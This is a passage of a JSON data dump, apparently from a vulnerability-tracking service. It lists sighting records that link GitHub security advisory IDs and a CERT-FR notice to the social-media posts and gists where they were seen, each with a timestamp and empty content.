"8db5844f-5c47-4d73-b48a-ecd2b43db6e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5cm-2hpq-pw57", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114548111014247564", "content": "", "creation_timestamp": "2025-05-21T22:11:03.926817Z"}, {"uuid": "5fe0f208-02d7-4424-8fbb-ad29be3de1eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/8d3e5d864626d5b66ea92d5fdcaf57cf", "content": "", "creation_timestamp": "2025-06-14T04:12:05.000000Z"}, {"uuid": "4289759a-0fce-4cde-9344-4ef508605a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m72m-mhq2-9p6c", "type": "seen", "source": "https://gist.github.com/safer-bot/88c5ad614f988a311f52a04fd6e6df97", "content": "", "creation_timestamp": "2025-07-16T06:09:57.000000Z"}, {"uuid": "55e582a6-d138-4866-bf53-259e43033c4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gp7f-rwcx-9369", "type": "seen", "source": "https://gist.github.com/safer-bot/88c5ad614f988a311f52a04fd6e6df97", "content": "", "creation_timestamp": "2025-07-16T06:09:57.000000Z"}, {"uuid": "31be86fe-6544-44d8-9669-060be43ddec5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/19a3375ea686e5b598d04878dfb53d86", "content": "", "creation_timestamp": "2025-07-16T09:53:00.000000Z"}, {"uuid": "f84baf98-763a-43c1-a546-58af089f7471", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/36dcbf66410750b1c657ab6793d1bd3c", "content": "", "creation_timestamp": "2025-06-14T04:21:49.000000Z"}, {"uuid": "ee09af30-511c-47c1-8076-f1f751e6376d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vfw-wx65-c872", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114813675213683577", "content": "", "creation_timestamp": "2025-07-07T19:47:32.185328Z"}, {"uuid": "daec1c7f-b83c-438e-9a7a-962e3d367e72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h86g-x8mm-78m5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114659883686202262", "content": "", "creation_timestamp": "2025-06-10T15:56:19.646196Z"}, {"uuid": "ecc2276a-80c8-4ad5-a0d0-6f76ded25bf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4hf-r8gj-jgw2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114659883686202262", "content": "", "creation_timestamp": "2025-06-10T15:56:19.753948Z"}, {"uuid": "d28d55a7-691e-4159-8e95-24f89f13774c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jj54-8f66-c5pc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114659883686202262", "content": "", "creation_timestamp": "2025-06-10T15:56:19.823280Z"}, {"uuid": "f9aa9ef0-3412-4f0b-bb1c-d58605ebc948", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gr67-pwcv-76gf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114659883686202262", "content": "", "creation_timestamp": "2025-06-10T15:56:19.892136Z"}, {"uuid": "df429db8-f713-424a-9c29-0b69469d0b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/0d859c6417daeb3d3432a47a3b941e2e", "content": "", "creation_timestamp": "2025-06-14T04:25:34.000000Z"}, {"uuid": "4ad8e0ce-0bdc-4297-85d5-7429d2ca5d86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/3c07d6cb9d4d50c65b92850fe6b9f2d9", "content": "", "creation_timestamp": "2025-06-16T20:08:28.000000Z"}, {"uuid": "1d0cbe69-b199-462b-875e-c88c0364bc9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/3c07d6cb9d4d50c65b92850fe6b9f2d9", "content": "", "creation_timestamp": "2025-06-16T20:08:28.000000Z"}, {"uuid": "72a37513-ffb2-4a36-8466-6be4b73ba8c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "4dc1bef7-4216-4fd9-8e93-47a923e92c30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "51ba4518-b7be-4081-94ab-4fc75c034965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67rr-84xm-4c7r", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lt3x3t6ae42m", "content": "", "creation_timestamp": "2025-07-04T00:06:22.154225Z"}, {"uuid": "0bc05065-b1d5-4e39-acd9-cd98f5b2b7ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-493p-pfq6-5258", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "c45ffe5a-7c6c-4824-9737-173cb7329322", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "d04eb44e-0405-4c65-887a-beef95987802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "7158368e-d07b-4e00-ad68-3b1b779c411d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "f01c1110-c1b0-465c-a116-a2520104a1c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "87b0fd80-07a7-4a90-8deb-b5d57e299b9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "40936dbd-6105-495b-b89c-eab3e13047c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/6760e2e5c5c15c08cac56b85a4b18949", "content": "", "creation_timestamp": "2025-07-16T06:14:34.000000Z"}, {"uuid": "1cadb4fe-e57c-4761-a7bf-9d8504402209", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/6760e2e5c5c15c08cac56b85a4b18949", "content": "", "creation_timestamp": "2025-07-16T06:14:34.000000Z"}, {"uuid": "dbb3640f-6efb-48d8-879d-9b2f8b70bb8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/6760e2e5c5c15c08cac56b85a4b18949", "content": "", "creation_timestamp": "2025-07-16T06:14:34.000000Z"}, {"uuid": "45c246f2-dd5d-4823-9d90-9bdad1769e08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2xm-76pq-phcf", "type": "seen", "source": "https://gist.github.com/safer-bot/dcba38acd7b3b589f657659fa2a6b641", "content": "", "creation_timestamp": "2025-07-16T06:27:33.000000Z"}, {"uuid": "75eab94a-0293-4851-b1f5-2a1fef28afbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/dcba38acd7b3b589f657659fa2a6b641", "content": "", "creation_timestamp": "2025-07-16T06:27:33.000000Z"}, {"uuid": "881ab0aa-aa69-43d0-b672-0cae0820a61a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/33eb6239930b41b47aec1e2045875722", "content": "", "creation_timestamp": "2025-07-16T11:53:58.000000Z"}, {"uuid": "57cef2d9-69d2-4997-a0a3-4f2dc82cf711", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/dcba38acd7b3b589f657659fa2a6b641", "content": "", "creation_timestamp": "2025-07-16T06:27:33.000000Z"}, {"uuid": "2d0e9a8f-ac9b-4fed-b771-ac2e8141650b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/dcba38acd7b3b589f657659fa2a6b641", "content": "", "creation_timestamp": "2025-07-16T06:27:33.000000Z"}, {"uuid": "a1714abe-20f2-4c12-a442-f19c65a6f56d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gmg8-593g-7mv3", "type": "seen", "source": "https://gist.github.com/safer-bot/dcba38acd7b3b589f657659fa2a6b641", "content": "", "creation_timestamp": "2025-07-16T06:27:33.000000Z"}, {"uuid": "b0c9fa45-b625-404a-8c93-1861b68863ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/33eb6239930b41b47aec1e2045875722", "content": "", "creation_timestamp": "2025-07-16T11:53:58.000000Z"}, {"uuid": "f7300b52-2ae6-4cab-808b-dc221014310a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cgp8-4m63-fhh5", "type": "seen", "source": "https://gist.github.com/safer-bot/33eb6239930b41b47aec1e2045875722", "content": "", "creation_timestamp": "2025-07-16T11:53:58.000000Z"}, {"uuid": "a7c4448a-6638-45cd-86d3-7233616bcc5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/1915b7b93f8ad1ca501373e767521f49", "content": "", "creation_timestamp": "2025-07-16T13:56:02.000000Z"}, {"uuid": "20f0b4cb-e498-4080-9168-005cde7c3421", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qx2m-rcpc-v43v", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-0aa1c1a3-596b69f6d4d09712", "content": "", "creation_timestamp": "2025-05-16T14:11:05.389092Z"}, {"uuid": "6734802c-8b41-4cb3-8d58-c291219329ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/4b73ef8853076dda61665c14d9900402", "content": "", "creation_timestamp": "2025-07-16T06:36:45.000000Z"}, {"uuid": "bd1ec6f2-53a0-4ad2-a4f5-43abb769ca70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/4b73ef8853076dda61665c14d9900402", "content": "", "creation_timestamp": "2025-07-16T06:36:45.000000Z"}, {"uuid": "d6fbc7b2-bca9-470c-b460-ddf3891be1e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9f65-56v6-gxw7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114774063698653725", "content": "", "creation_timestamp": "2025-06-30T19:53:48.524148Z"}, {"uuid": "321cca48-138a-48ee-9a1e-ecdd68988363", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/6b22f3fa3fb3167a2d867df02fe410f8", "content": "", "creation_timestamp": "2025-07-16T06:41:28.000000Z"}, {"uuid": "c280137a-446b-4c13-b3b8-8f89da4f1285", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/6b22f3fa3fb3167a2d867df02fe410f8", "content": "", "creation_timestamp": "2025-07-16T06:41:28.000000Z"}, {"uuid": "ba0e7a98-d21b-4db8-8998-4e55c22a0b90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/06c63a0cfe3aa70a9285ec2c594df745", "content": "", "creation_timestamp": "2025-07-16T11:56:38.000000Z"}, {"uuid": "1a67e8b1-e2eb-408a-8bbb-e4301081f96c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rxv-5jhh-j6xx", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114774063698653725", "content": "", "creation_timestamp": "2025-06-30T19:53:48.623669Z"}, {"uuid": "3716ff53-d7bc-4624-b18d-95471e5b9ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/b84d20ef3f79ebe3f9eddc22d95f9fd9", "content": "", "creation_timestamp": "2025-07-16T06:43:44.000000Z"}, {"uuid": "6c943705-00f6-438a-ba1f-73fa2791c750", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jpv7-p47h-f43j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114774078524435473", "content": "", "creation_timestamp": "2025-06-30T19:57:35.258890Z"}, {"uuid": "a8241576-40c6-4d75-923d-30d4660f6dd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/a0e17f7f3249d2b5ce84433d1f929dcf", "content": "", "creation_timestamp": "2025-07-16T06:47:18.000000Z"}, {"uuid": "19fdba9f-fad4-44c6-bc88-8a121c2a84bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/a0e17f7f3249d2b5ce84433d1f929dcf", "content": "", "creation_timestamp": "2025-07-16T06:47:18.000000Z"}, {"uuid": "bd2e9b97-2ab0-47b0-be20-2d7935c5f547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/775ec57ea2d52c4018fd2a48f2d948c6", "content": "", "creation_timestamp": "2025-07-16T06:50:00.000000Z"}, {"uuid": "fd40a72e-5ec1-42b7-a07e-d0dac6d61718", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/775ec57ea2d52c4018fd2a48f2d948c6", "content": "", "creation_timestamp": "2025-07-16T06:50:00.000000Z"}, {"uuid": "5a9fdae6-9467-41d2-b44d-fc810d768a75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5r4-cfpx-h6fh", "type": "seen", "source": "https://gist.github.com/safer-bot/06c63a0cfe3aa70a9285ec2c594df745", "content": "", "creation_timestamp": "2025-07-16T11:56:38.000000Z"}, {"uuid": "89fd86c7-d5d9-4390-b973-d97488bfbb1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5v34-g2px-j4fw", "type": "seen", "source": "https://gist.github.com/safer-bot/06c63a0cfe3aa70a9285ec2c594df745", "content": "", "creation_timestamp": "2025-07-16T11:56:38.000000Z"}, {"uuid": "ac826402-ccdf-4bc3-925d-ecf5ebc1c7bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p6w-m9wc-c9c9", "type": "seen", "source": "https://gist.github.com/safer-bot/06c63a0cfe3aa70a9285ec2c594df745", "content": "", "creation_timestamp": "2025-07-16T11:56:38.000000Z"}, {"uuid": "67ef02de-10e2-4b6e-83c4-5bedec188d26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/06c63a0cfe3aa70a9285ec2c594df745", "content": "", "creation_timestamp": "2025-07-16T11:56:38.000000Z"}, {"uuid": "90d9e289-9c21-4e00-8156-bfb0a4f323c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/06c63a0cfe3aa70a9285ec2c594df745", "content": "", "creation_timestamp": "2025-07-16T11:56:38.000000Z"}, {"uuid": "9737b3ca-f058-4089-ae58-ba74c2ae3473", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-015", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lmrkfn4af42l", "content": "", "creation_timestamp": "2025-04-14T12:21:25.378512Z"}, {"uuid": "669c6d36-0803-47df-8d5f-260e44d0e833", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-015", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114336286913520676", "content": "", "creation_timestamp": "2025-04-14T12:21:26.268947Z"}, {"uuid": "dfb02c36-89e6-4406-9cc1-1720a5168fcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-015", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lmrwjzux4x2a", "content": "", "creation_timestamp": "2025-04-14T15:58:37.835429Z"}, {"uuid": "012ff5ed-90b1-4db4-9a78-7746c2e4039c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33hw-xhfh-944r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114339178869394068", "content": "", "creation_timestamp": "2025-04-15T00:36:52.671495Z"}, {"uuid": "6da12d9a-e1b0-46e3-b9f7-384d8385ac1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrq4-9hc3-cgp7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114339189023793965", "content": "", "creation_timestamp": "2025-04-15T00:39:27.481973Z"}, {"uuid": "b4a0e53f-294d-4998-9af8-7b916da33b56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/775ec57ea2d52c4018fd2a48f2d948c6", "content": "", "creation_timestamp": "2025-07-16T06:50:00.000000Z"}, {"uuid": "8f41a62f-a657-401d-b50d-540a3478d1a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/775ec57ea2d52c4018fd2a48f2d948c6", "content": "", "creation_timestamp": "2025-07-16T06:50:00.000000Z"}, {"uuid": "c678b3d6-aaf5-419a-9f34-6dba267a556e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/06c63a0cfe3aa70a9285ec2c594df745", "content": "", "creation_timestamp": "2025-07-16T11:56:38.000000Z"}, {"uuid": "99a3635e-e2dd-4a26-8048-39fbb93e93a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w4g2-9hj6-5472", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "2132594f-375b-43ce-b55c-fb5b3fd8a7b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "7f6f8c90-e043-4f0d-89d7-d1a70e2aa47a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mm8h-8587-p46h", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "249c2129-8476-4ef3-a918-916640d66d2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "a7b82aaa-b55b-4dcc-aa10-1b62a63ab13b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "4c270208-9277-476a-baf0-57ef73162b5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "188f9e11-b707-4ad2-8de9-def695d6015f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "c18b7fa1-99cf-4107-ba40-b748ae58cca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/ac7888cd348a2c9b5cedd341ce88aeae", "content": "", "creation_timestamp": "2025-07-16T13:09:25.000000Z"}, {"uuid": "5e78990c-d05b-4639-932f-2520f7a98cb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 